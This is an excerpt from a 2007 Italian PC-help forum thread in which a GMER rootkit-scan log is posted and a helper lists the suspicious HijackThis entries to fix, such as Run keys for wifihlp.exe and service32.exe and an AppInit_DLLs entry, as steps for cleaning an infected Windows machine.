[F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_LOCK_CONTROL [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_CLEANUP [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_CREATE_MAILSLOT [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_QUERY_SECURITY [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_SET_SECURITY [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_POWER [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_SYSTEM_CONTROL [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_DEVICE_CHANGE [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_QUERY_QUOTA [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_SET_QUOTA [F994FEA8] pxfsf.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_CREATE [F9A935A4] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_CREATE_NAMED_PIPE [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_CLOSE [F9A966BE] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_READ [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_WRITE [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_QUERY_INFORMATION [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_SET_INFORMATION [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_QUERY_EA [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_SET_EA [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_FLUSH_BUFFERS [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_QUERY_VOLUME_INFORMATION [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_SET_VOLUME_INFORMATION [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_DIRECTORY_CONTROL [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_FILE_SYSTEM_CONTROL [F9A96A5A] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_DEVICE_CONTROL [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_INTERNAL_DEVICE_CONTROL [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_SHUTDOWN [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_LOCK_CONTROL [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_CLEANUP [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_CREATE_MAILSLOT [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_QUERY_SECURITY [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_SET_SECURITY [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_POWER [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_SYSTEM_CONTROL [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_DEVICE_CHANGE [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_QUERY_QUOTA [F9A9352C] avgntmgr.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_SET_QUOTA [F9A9352C] avgntmgr.sys Device \FileSystem\Udfs \UdfsCdRom IRP_MJ_FILE_SYSTEM_CONTROL [F6C9E62A] BsUDF.SYS Device \FileSystem\Udfs \UdfsDisk IRP_MJ_FILE_SYSTEM_CONTROL [F6C9E62A] BsUDF.SYS Device \FileSystem\Cdfs \Cdfs IRP_MJ_FILE_SYSTEM_CONTROL [F6C9E62A] BsUDF.SYS ---- EOF - GMER 1.0.13 ---- |
|
|
|
|
22-11-2007, 15:58
|
#19 | |
|
Registered User
Iscritto dal: Nov 2006
Città: Espoo, Finland
Messaggi: 1631
|
Quote:
|
|
|
|
|
|
22-11-2007, 18:10
|
#20 | |
|
Senior Member
Iscritto dal: Aug 2005
Città: Genova
Messaggi: 3397
|
1) disabilita ripr conf di sys
2) fixa: O2 - BHO: (no name) - {DA39029C-D291-A968-3FF4-D0990D5CB5FC} - (no file) O4 - HKLM\..\Policies\Explorer\Run: [wifihlp] "c:\windows\wifihlp.exe" O4 - HKLM\..\Policies\Explorer\Run: [1] C:\WINDOWS\service32.exe O4 - HKLM\..\Policies\Explorer\Run: [delldrv] "c:\windows\delldrv.exe" O16 - DPF: {4FAE30E1-EE9C-477D-8D06-BF8D3429B60F} (WebIQ Technology Client) - https://www.webiqonline.com/WebIQ/bin/WebIQ.cab O20 - AppInit_DLLs: C:\:olvh2.dll 3) apri avenger ed immetti questo script: Quote:
__________________
Rimozione Worm/Rootkit Bagle - Rimozione Trojan Vundo - Rimozione virus MSN Messenger -Rimozione virus su chiavetta o errori di file mancante all'apertura del disco fisso - NT AUTHORITY SYSTEM spegne il pc ad ogni avvio. Cosa fare?(worm sasser/blaster/rustock) - Thread Ufficiale firewall software |
|
|
|
|
|
|
| Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 11:25.
